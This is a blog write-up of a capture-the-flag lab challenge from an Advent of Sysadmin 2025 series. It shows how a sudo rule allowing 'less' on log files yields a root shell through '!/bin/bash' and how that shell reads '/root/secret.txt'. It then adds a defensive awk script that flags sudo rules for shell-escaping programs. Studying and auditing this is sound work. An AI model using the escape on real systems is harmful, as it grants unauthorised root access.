La Rinconada - Advent of Sysadmin 2025

This is part of Sad Servers' Advent of Sysadmin 2025 series.

I'm doing each challenge every day and I'm publishing a quick write-up for each one every day.

Spoiler alert! This gives the solution to the challenge. If you want to do it on your own, stop reading.


Challenge details

Scenario: "La Rinconada": Elevating privileges

Level: Medium

Type: Hack

Tags: hack, advent2025

Access: Email

Description: You are logged in as the user "admin" without general "sudo" privileges. The system administrator has granted you limited "sudo" access; this was intended to allow you to read log files.

Your mission is to find a way to exploit this limited sudo permission to gain a full root shell and read the secret file at /root/secret.txt. Copy the content of /root/secret.txt into the /home/admin/solution.txt file, for example: cat /root/secret.txt > /home/admin/solution.txt (the "admin" user must be able to read the file).

Root (sudo) Access: False

Test: As the user "admin", md5sum /home/admin/solution.txt returns 52a55258e4d530489ffe0cc4cf02030c (we also accept the hash of the same secret string without an ending newline).

The "Check My Solution" button runs the script /home/admin/agent/check.sh, which you can see and execute.

Time to Solve: 15 minutes.


Cool little challenge to learn how to break out of a restricted shell when you have limited sudo access.

Start by listing what sudo access our user has:

admin@i-0adfc7a1f5cd64cfb:~$ whoami
admin

admin@i-0adfc7a1f5cd64cfb:~$ sudo -l
Matching Defaults entries for admin on i-0adfc7a1f5cd64cfb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User admin may run the following commands on i-0adfc7a1f5cd64cfb:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/less /var/log/*

The challenge description hinted at the fact that we could read some logs. As shown by the sudo -l command, we can use less to open files in /var/log/* as root without any password.

less is a pager that displays file content in a terminal window. Its commands are based on vi and vim. But this is where it gets interesting: while reading a file in less, you can invoke shell commands by prefixing them with !, just like you would in vi. less spawns a shell to run whatever command you pass in. Since we're running less as root via sudo, any spawned shell inherits those root privileges.

less(1) - Linux manual page

That means we can get a root shell from within less.

sudo less /var/log/dpkg.log # file will open in less, showing first lines

!whoami # type this once you're in less

root

!done (press RETURN) # pressing return to go back to less

!/bin/bash # type this to get an interactive shell as root

We can actually run the command from the challenge description directly from less. No need to enter a sub-shell:

sudo less /var/log/dpkg.log

!cat /root/secret.txt > /home/admin/solution.txt

And that's it. We escaped the limited shell and got the secret. 🚩
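
From the defender's side, the rule that made this possible can be spotted in `sudo -l` output. The script below is an added example, not part of the original write-up or the challenge: it flags sudo rules for programs with a built-in shell escape unless the rule carries the sudoers NOEXEC tag. The function names and the program list are assumptions of this example.

```shell
#!/bin/sh
# Added example: flag sudo rules that hand out a program with a built-in
# shell escape (such as the less rule above) unless NOEXEC is set.

# Constructed input: the rule lines from the `sudo -l` output shown above.
sample_sudo_l() {
cat <<'EOF'
User admin may run the following commands on i-0adfc7a1f5cd64cfb:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/less /var/log/*
EOF
}

# Reads `sudo -l` output on stdin, prints one line per risky command.
# ESCAPERS is an illustrative, non-exhaustive list (assumption of this example).
# Tags that change in the middle of a command list are not handled.
audit_sudo_rules() {
  awk -v ESCAPERS="less more vi vim view man" '
    BEGIN { n = split(ESCAPERS, e, " "); for (i = 1; i <= n; i++) risky[e[i]] = 1 }
    /^[ \t]*\(/ {
      spec = $0
      sub(/^[ \t]*\([^)]*\)[ \t]*/, "", spec)   # drop the "(runas)" part
      noexec = 0
      while (match(spec, /^[A-Z_]+:[ \t]*/)) {   # peel tags: NOPASSWD:, NOEXEC:, ...
        if (substr(spec, 1, RLENGTH) ~ /^NOEXEC:/) noexec = 1
        spec = substr(spec, RLENGTH + 1)
      }
      if (noexec) next                           # sudo blocks further exec for these
      m = split(spec, cmds, /,[ \t]*/)           # a rule may list several commands
      for (j = 1; j <= m; j++) {
        split(cmds[j], w, " ")
        base = w[1]; sub(/.*\//, "", base)       # /usr/bin/less -> less
        if (base in risky) print "SHELL-ESCAPE: " cmds[j]
      }
    }
  '
}

# Stand-alone run: audit the constructed sample.
sample_sudo_l | audit_sudo_rules
```

On a real host, pipe `sudo -l -U <user>` into `audit_sudo_rules`; the "Preventing shell escapes" section of sudoers(5) describes what NOEXEC does and does not cover.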

Here are some great resources about escaping restricted shells: